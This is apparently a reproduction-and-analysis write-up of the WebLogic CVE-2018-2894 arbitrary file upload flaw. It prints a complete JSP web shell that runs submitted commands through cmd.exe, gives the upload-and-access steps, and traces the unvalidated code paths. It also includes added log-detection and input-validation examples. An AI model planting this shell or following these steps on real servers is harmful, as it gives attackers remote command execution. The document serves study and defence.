WebLogic arbitrary file upload vulnerability: reproduction and analysis (CVE-2018-2894)


CVE-2018-2894

Affected versions: 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3

Download: http://download.oracle.com/otn/nt/middleware/12c/12213/fmw_12.2.1.3.0_wls_quick_Disk1_1of1.zip

Reproducing the vulnerability

After the service starts, access http://localhost:7001/ws_utc/config.do

The current working directory can be changed to a different directory. In the local environment used here, for example, it can be set to C:\Oracle\Middleware\Oracle_Home\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\com.oracle.webservices.wls.ws-testclient-app-wls\4mcj4y\war

Select the "Security" column on the right and add a JKS Keystores entry to upload a file. Assume chybeta.jsp has the following content:

    <%@ page import="java.util.*,java.io.*,java.net.*" %>
    <HTML><BODY>
    <FORM METHOD="POST" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <%
    // Runs the submitted "cmd" parameter through cmd.exe and echoes its output
    if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "\n<br>");
        Process p = Runtime.getRuntime().exec("cmd.exe /c " + request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while (disr != null) {
            out.println(disr);
            disr = dis.readLine();
        }
    }
    %>
    </pre>
    </BODY></HTML>

Capturing the upload request shows the timestamp 1531987145013, so the uploaded file is stored at config\keystore\1531987145013_chybeta.jsp

Access http://localhost:7001/ws_utc/config/keystore/1531987145013_chybeta.jsp
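
Seen from the defender's side, the two requests above leave a recognizable trail in the HTTP access log. The following is an added example, not part of the original post: it flags requests to the ws_utc settings page and requests for uploaded files under /ws_utc/config/keystore/ whose extension is not a keystore type. The class name, the Common Log Format layout, the extension allowlist and the sample log lines are assumptions constructed for illustration.

```java
import java.util.*;
import java.util.regex.*;

public class WsUtcLogCheck {
    // Common Log Format: ip - - [time] "METHOD path HTTP/x" status size
    static final Pattern LINE = Pattern.compile(
        "^(\\S+) \\S+ \\S+ \\[[^\\]]+\\] \"\\S+ (\\S+) [^\"]*\" (\\d{3})");
    // Stored upload name: 13-digit millisecond timestamp + "_" + original file name.
    static final Pattern STORED = Pattern.compile("^/ws_utc/config/keystore/\\d{13}_([^/?]+)");
    static final Set<String> KEYSTORE_EXT = Set.of("jks", "p12", "pfx"); // assumed allowlist

    static List<String> scan(List<String> lines) {
        List<String> findings = new ArrayList<>();
        Set<String> sawConfig = new HashSet<>(); // clients that opened the settings page
        for (String line : lines) {
            Matcher m = LINE.matcher(line);
            if (!m.find()) continue;
            String ip = m.group(1), path = m.group(2), status = m.group(3);
            if (path.startsWith("/ws_utc/config.do")) {
                sawConfig.add(ip);
                findings.add("INFO " + ip + " opened /ws_utc/config.do -> " + status);
            }
            Matcher s = STORED.matcher(path);
            if (!s.find()) continue;
            String name = s.group(1);
            String ext = name.substring(name.lastIndexOf('.') + 1).toLowerCase(Locale.ROOT);
            if (!KEYSTORE_EXT.contains(ext)) {
                // Same client touched the settings page earlier: raise the severity.
                String sev = sawConfig.contains(ip) ? "HIGH" : "WARN";
                findings.add(sev + " " + ip + " fetched uploaded file " + name + " -> " + status);
            }
        }
        return findings;
    }

    public static void main(String[] args) {
        List<String> sample = List.of( // constructed log lines
            "192.0.2.10 - - [19/Jul/2018:15:58:01 +0800] \"GET /ws_utc/config.do HTTP/1.1\" 200 5120",
            "192.0.2.10 - - [19/Jul/2018:15:59:05 +0800] \"GET /ws_utc/config/keystore/1531987145013_chybeta.jsp HTTP/1.1\" 200 310",
            "198.51.100.7 - - [19/Jul/2018:16:02:11 +0800] \"GET /console/login/LoginForm.jsp HTTP/1.1\" 200 2048");
        scan(sample).forEach(System.out::println);
    }
}
```

On the sample input this reports one INFO finding for the settings page and one HIGH finding for the .jsp file; the unrelated console request is ignored.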

Brief vulnerability analysis

In ws-testpage-impl.jar!/com/oracle/webservices/testclient/setting/TestClientWorkDirManager.class:59:

    public void changeWorkDir(String path) {
        String[] oldPaths = this.getRelatedPaths();
        if (this.testPageProvider.getWsImplType() == ImplType.JRF) {
            this.isWorkDirChangeable = false;
            this.isWorkDirWritable = isDirWritable(path);
            this.isWorkDirChangeable = true;
            this.setTestClientWorkDir(path);
        } else {
            this.persistWorkDir(path);
            this.init();
        }
        // Only writability is considered; the location of the new path is never validated
        if (this.isWorkDirWritable) {
            String[] newPaths = this.getRelatedPaths();
            moveDirs(oldPaths, newPaths);
        } else {
            Logger.fine("[INFO] Newly specified TestClient Working Dir is readonly. Won't move the configuration stuff to new path.");
        }
    }

This function is used to change the working directory, but it does not perform any checks on the path.

In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/res/SettingResource.class:181:

    @Path("/keystore")
    @POST
    @Produces({"application/xml", "application/json"})
    @Consumes({"multipart/form-data"})
    public Response editKeyStoreSettingByMultiPart(FormDataMultiPart formPartParams) {
        if (!RequestUtil.isRequstedByAdmin(this.request)) {
            return Response.status(Status.FORBIDDEN).build();
        } else {
            if (TestClientRT.isVerbose()) {
                Logger.fine("calling SettingResource.addKeyStoreSettingByMultiPart");
            }
            // The millisecond timestamp becomes the prefix of the stored file name
            String currentTimeValue = "" + (new Date()).getTime();
            KeyValuesMap<String, String> formParams = RSDataHelper.getInstance().convertFormDataMultiPart(formPartParams, true, TestClientRT.getKeyStorePath(), currentTimeValue);
            ...
        }
    }

Following into ws-testpage-impl.jar!/com/oracle/webservices/testclient/core/ws/cdf/config/parameter/TestClientRT.class:31:

    public static String getKeyStorePath() {
        return getConfigDir() + File.separator + "keystore";
    }

This yields the path to write to, storePath.

In ws-testpage-impl.jar!/com/oracle/webservices/testclient/ws/util/RSDataHelper.class:145:

    public KeyValuesMap<String, String> convertFormDataMultiPart(FormDataMultiPart formPartParams, boolean isExtactAttachment, String path, String fileNamePrefix) {
        ...
        if (attachName != null && attachName.trim().length() > 0) {
            if (attachName != null && attachName.trim().length() != 0) {
                attachName = this.refactorAttachName(attachName);
                if (fileNamePrefix == null) {
                    fileNamePrefix = key;
                }
                // The client-supplied name is appended to the prefix as-is
                String filename = (new File(storePath, fileNamePrefix + "_" + attachName)).getAbsolutePath();
                kvMap.…(key, filename);   // method name missing in this copy of the page
                if (isExtactAttachment) {
                    // Writes the uploaded content to filename; method name missing in this copy of the page
                    this.…(filename, (InputStream) bodyPart.getValueAs(InputStream.class));
                }
            }
        }
        ...
    }

The contents of the uploaded file are written into the storePath directory, under a file name of the form fileNamePrefix + "_" + attachName. This process does not apply any filtering or checking :) ...
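
The two checks that the analysis finds missing (no validation of the new work directory in changeWorkDir, no validation of attachName in convertFormDataMultiPart) can be sketched as follows. This is an added example, not code from the original post and not Oracle's patch: the class and method names, the extension allowlist and the demo paths are hypothetical.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;
import java.util.List;
import java.util.Locale;
import java.util.Set;

public class KeystoreUploadGuard {
    static final Set<String> ALLOWED_EXT = Set.of("jks", "p12", "pfx"); // assumed allowlist

    static Path canon(Path p) throws IOException {
        return p.toFile().getCanonicalFile().toPath();
    }

    // Check absent from changeWorkDir: refuse a work dir inside any web-served tree.
    static void checkWorkDir(Path workDir, List<Path> servedRoots) throws IOException {
        for (Path root : servedRoots)
            if (canon(workDir).startsWith(canon(root)))
                throw new SecurityException("work dir is web-served: " + workDir);
    }

    // Check absent from convertFormDataMultiPart: validate attachName before building the path.
    static File resolveTarget(File storePath, String prefix, String attachName) throws IOException {
        String base = new File(attachName.replace('\\', '/')).getName(); // drop client-supplied dirs
        int dot = base.lastIndexOf('.');
        String ext = dot < 0 ? "" : base.substring(dot + 1).toLowerCase(Locale.ROOT);
        if (!base.matches("[A-Za-z0-9._-]{1,100}") || !ALLOWED_EXT.contains(ext))
            throw new SecurityException("rejected upload name: " + attachName);
        File target = new File(storePath, prefix + "_" + base).getCanonicalFile();
        if (!target.toPath().startsWith(canon(storePath.toPath())))
            throw new SecurityException("target escapes store path: " + target);
        return target;
    }

    public static void main(String[] args) throws IOException {
        // Constructed paths and names, for demonstration only.
        Path war = Path.of(System.getProperty("java.io.tmpdir"), "demo_domain", "war");
        File store = war.resolveSibling("ws_utc_work").resolve("config/keystore").toFile();
        for (String name : List.of("client.jks", "chybeta.jsp", "..\\..\\war\\x.jsp")) {
            try {
                System.out.println("accept " + resolveTarget(store, "1531987145013", name));
            } catch (SecurityException e) {
                System.out.println(e.getMessage());
            }
        }
        try {
            checkWorkDir(war.resolve("css"), List.of(war)); // work dir under the war: refused
        } catch (SecurityException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

Either check alone breaks the chain described above: a .jsp name is never written, and a keystore directory outside the deployed web application is never served back to the client.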

Conditions:

    • You need to know the web directory where the application is deployed
    • ws_utc/config.do requires no authentication in development mode, but does require authentication in production mode. For details, see Oracle® Fusion Middleware Administering Web Services
